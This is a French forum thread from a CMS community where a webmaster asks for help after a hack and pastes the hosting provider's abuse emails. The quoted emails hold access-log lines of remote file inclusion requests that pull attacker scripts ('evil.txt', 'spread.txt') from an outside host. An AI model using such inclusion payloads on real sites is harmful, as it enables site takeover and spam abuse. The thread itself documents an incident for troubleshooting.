Gestion de Contenu, de Communauté et de groupes de travail collaboratif - Open Source, français, sécurisé, stable et performant

  • MODULES

    Pour étendre les nombreuses fonctionnalités disponibles de base - modules.npds.org est à votre disposition.

    Des modules complémentaires, une communauté de développeurs active, des forums pour vos questions ... NPDS  est aussi une plateforme de développement !
  • STYLES

    Vous cherchez des thèmes graphiques pour votre portail ou votre communauté : styles.npds.org est à votre disposition.

    Des thèmes du plus simple au plus sophistiqué. Des thèmes facilement modifiables et toujours en Open-Source - Laissez simplement parler votre imagination !
  • BIBLES

    La documentation indispensable pour personnaliser et exploiter toute la puissante de NPDS  est à votre disposition sur bible.npds.org.

    Vous pouvez participer à l'effort de documentation - rien de plus simple : contactez un membre de la Team de développement et nous vous ouvrirons un compte sur le Wiki !
Devenir membre    |    Identifiant : Mot de Passe : -
Au delà de la gestion de contenu 'classique', NPDS met en oeuvre un ensemble de fonctions spécifiquement dédiées à la gestion de Communauté et de groupes de travail collaboratif.
Il s'agit d'un Content & Community Management System (CCMS) robuste, sécurisé, complet, performant et parlant vraiment français.

Gérez votre Communauté d'utilisateurs, vos groupes de travail collaboratif, publiez, gérez et organisez votre contenu grâce aux puissants outils disponibles de base.
  • Multi langues (Français, Anglais, Allemand, Espagnol, Chinois)
  • Respect des standards : UTF8, XHTML, CSS, ...
  • Système de blocs avancés
  • Installation et administration complète et centralisée
  • Editeur HTML intégré
  • Gestionnaire de fichier en ligne
  • Gestion des groupes de membres
  • Ecriture collaborative de documents (PAD)
  • Forums évolués
  • Mini-sites (pour les membres et les groupes de travail)
  • Chat temp réel
  • Système de News et de rubriques complet (édition, révision, publication)
  • ...
Gratuit et libre (Open-Source), développé en PHP, NPDS est personnalisable grâce à de nombreux thèmes et modules et ne requiert que quelques compétences de base.
NPDS Workplace - groupe de travail collaboratif
 NPDS WorkSpace - tous l'univers du travail collaboratif.
Modéré par : developpeur jpb Jireck 
Index du Forum » » Sécurité » » Piratage de mon site  
AuteurPiratage de mon site
Anonyme
19757  

Anonyme
  Posté : 30-01-2009 18:54

Bonjour,
J'ai été victime du piratage de mon site, ce matin, il affichait une page internet, comme quoi il a été hacké par la "Turk Attack team". J'ai donc remplacé cette page index, par l'ancienne. Le site a pu repartir.
Ensuite, j'ai cherché sur internet comment sécurisé mon site, j'ai trouvé quelques trucs, (notamment au niveau du .htaccess), que j'ai appliqué.
Ce soir, mon site n'est plus accessible, car mon hébergeur vient de bloquer tout accès, une page 403 est donc visible lorsque je me rends sur mon site.
Mon hébergeur (1and1) me demande de remédier aux problèmes dans mes scripts, mais je n'ai plus accès en FTP à mon site ...
Bref, ils m'ont envoyé un mail m'indiquant :

----

Depuis notre dernier courrier, nous avons reçu de nouvelles plaintes concernant
l'envoi de spam à partir de votre espace web 1&1.

L'envoi de spam représentant un danger imminent pour notre infrastructure, votre
espace web sera bloqué suite à ce message.

Pour le débloquer, veuillez nous faire part des délais dans lesquels vous saurez
vous adresser au problème. Pour ce faire, merci de répondre à cet email en
laissant notre référence REF dans votre message.

Dans le cas où l'envoi de spam a été extrêmement massif, ce message peu avoir
été envoyé très peu de temps après notre première notification. Dans ce cas,
nous regrettons que vous n'auriez pas eu le temps de trouver solution au
problème et éviter le blocage. Toutefois, le blocage est indispensable pour la
protection de notre infrastructure.

----

Puis un autre :

----

Mes collègues de notre division " Administration Serveurs " nous
informent qu'un script non sécurisé fût détecté sur votre compte client
***.

root@infong11:/kunden/homepages/1/d145180228/htdocs# chmod -v 000
license.php perl.pl errors.php
mode of `license.php' changed to 0000 (---------)
mode of `perl.pl' changed to 0000 (---------)
mode of `errors.php' changed to 0000 (---------)
root@infong11:/kunden/homepages/1/d145180228/htdocs# ln -sv
/usr/lib/php.ini-nourl php.ini
create symbolic link `php.ini' to `/usr/lib/php.ini-nourl'

151.66.131.59 - - [27/Jan/2009:11:20:28 +0100] "GET
//?page=http://ks27457.myhostlife.org/evil.txt2?? HTTP/1.1" 200 3309
www.magietopia.fr "-" "Mozilla/3.0 (compatible; Indy Library)" "-"
151.66.131.59 - - [27/Jan/2009:11:22:34 +0100] "GET
//?page=http://ks27457.myhostlife.org/spread.txt?? HTTP/1.1" 200 3329
www.magietopia.fr "-" "Mozilla/3.0 (compatible; Indy Library)" "-"

Vous êtes invité à sécuriser le plus rapidement possible ce script, il
est déjà possible que ce dernier soit suspendu suivant le risque que ce
dernier représenterait.

Nous vous remercions pour votre compréhension et votre collaboration au
traitement de cette alerte.

----

Le problème c'est que je n'y comprends pas grand chose dans ces lignes. Je sais simplement qu'un script a du envoyé massivement du spam, mais pour le second mail, je ne sais pas quoi faire.

Quelqu'un pourrait m'aider s'il vous plait ?

  Citation   
Anonyme
19757  

Anonyme
  Posté : 30-01-2009 20:03

Site NPDS?
Quelle version svp?

  Citation   
Jireck
7985       

Jireck
  Posté : 30-01-2009 20:55

les fichiers cités ne sont pas ceux de npds mais d'autres script

  Profil  www  Citation   
Anonyme
19757  

Anonyme
  Posté : 30-01-2009 22:59


  Citation   
Hotfirenet
1738       
 

Hotfirenet
  Posté : 31-01-2009 15:03

je ne pense pas que tu te sois fait pirater par le biais de NPDS

  Profil  E-mail  www  Citation   
developpeur
24560       
 

developpeur
  Posté : 03-02-2009 17:50

Pas de nouvelle ?

  Profil  E-mail  www  Citation   
  
Sauter à :

Temps : 0.0112 seconde(s)